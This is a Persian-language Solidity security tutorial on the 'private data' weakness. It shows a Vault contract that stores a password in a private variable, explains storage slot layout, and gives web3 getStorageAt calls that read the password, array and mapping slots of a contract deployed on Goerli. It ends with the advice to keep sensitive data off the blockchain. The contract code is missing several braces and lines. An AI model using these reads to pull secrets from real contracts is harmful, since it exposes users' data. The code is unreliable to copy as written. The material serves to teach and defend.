
آسیب پذیری دسترسی به اطلاعات خصوصی

تمام اطلاعات در قرارداد های هوشمند قابل خوانده شدن هستن.

بیاین ببینیم چطوری میتونیم اطلاعات private رو بخونیم. توی این روند میبینین سالیدیتی چطوری متغیر های حالت (state variables) رو ذخیره میکنه.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

Note: cannot use web3 on JVM, so use the contract deployed on Goerli
Note: browser Web3 is old so use Web3 from truffle console

Contract deployed on Goerli

# Storage
- 2 ** 256 slots
- 32 bytes for each slot
- data is stored sequentially in the order of declaration
- storage is optimized to save space. If neighboring variables fit in a single
  32 bytes, then they are packed into the same slot, starting from the right

contract Vault {
    // slot 0
    uint256 public count = 123;
    // slot 1
    address public owner = msg.sender;
    bool public isTrue = true;
    uint16 public u16 = 31;
    // slot 2
    bytes32 private password;

    // constants do not use storage
    uint256 public constant someConst = 123;

    // slot 3, 4, 5 (one for each array element)
    bytes32[3] public data;

    struct User {
        uint256 id;
        bytes32 password;

    // slot 6 - length of array
    // starting from slot hash(6) - array elements
    // slot where array element is stored = keccak256(slot)) + (index * elementSize)
    // where slot = 6 and elementSize = 2 (1 (uint) +  1 (bytes32))
    User[] private users;

    // slot 7 - empty
    // entries are stored at hash(key, slot)
    // where slot = 7, key = map key
    mapping(uint256 => User) private idToUser;

    constructor(bytes32 _password) {
        password = _password;

    function addUser(bytes32 _password) public {
        User memory user = User({id: users.length, password: _password});

        idToUser[user.id] = user;

    function getArrayLocation(uint256 slot, uint256 index, uint256 elementSize)
        returns (uint256)
            uint256(keccak256(abi.encodePacked(slot))) + (index * elementSize);

    function getMapLocation(uint256 slot, uint256 key)
        returns (uint256)
        return uint256(keccak256(abi.encodePacked(key, slot)));

slot 0 - count
web3.eth.getStorageAt("0x534E4Ce0ffF779513793cfd70308AF195827BD31", 0, console.log)
slot 1 - u16, isTrue, owner
web3.eth.getStorageAt("0x534E4Ce0ffF779513793cfd70308AF195827BD31", 1, console.log)
slot 2 - password
web3.eth.getStorageAt("0x534E4Ce0ffF779513793cfd70308AF195827BD31", 2, console.log)

slot 6 - array length
getArrayLocation(6, 0, 2)
Note: We can also use web3 to get data location
web3.utils.soliditySha3({ type: "uint", value: 6 })
1st user
web3.eth.getStorageAt("0x534E4Ce0ffF779513793cfd70308AF195827BD31", "0xf652222313e28459528d920b65115c16c04f3efc82aaedc97be59f3f377c0d3f", console.log)
web3.eth.getStorageAt("0x534E4Ce0ffF779513793cfd70308AF195827BD31", "0xf652222313e28459528d920b65115c16c04f3efc82aaedc97be59f3f377c0d40", console.log)
Note: use web3.toAscii to convert bytes32 to alphabet
2nd user
web3.eth.getStorageAt("0x534E4Ce0ffF779513793cfd70308AF195827BD31", "0xf652222313e28459528d920b65115c16c04f3efc82aaedc97be59f3f377c0d41", console.log)
web3.eth.getStorageAt("0x534E4Ce0ffF779513793cfd70308AF195827BD31", "0xf652222313e28459528d920b65115c16c04f3efc82aaedc97be59f3f377c0d42", console.log)

slot 7 - empty
getMapLocation(7, 1)
Note: We can also use web3 to get data location
web3.utils.soliditySha3({ type: "uint", value: 1 }, {type: "uint", value: 7})
user 1
web3.eth.getStorageAt("0x534E4Ce0ffF779513793cfd70308AF195827BD31", "0xb39221ace053465ec3453ce2b36430bd138b997ecea25c1043da0c366812b828", console.log)
web3.eth.getStorageAt("0x534E4Ce0ffF779513793cfd70308AF195827BD31", "0xb39221ace053465ec3453ce2b36430bd138b997ecea25c1043da0c366812b829", console.log)

تکنیک های جلوگیری: #

اطلاعات حساس رو توی بلاکچین ذخیره نکنین.

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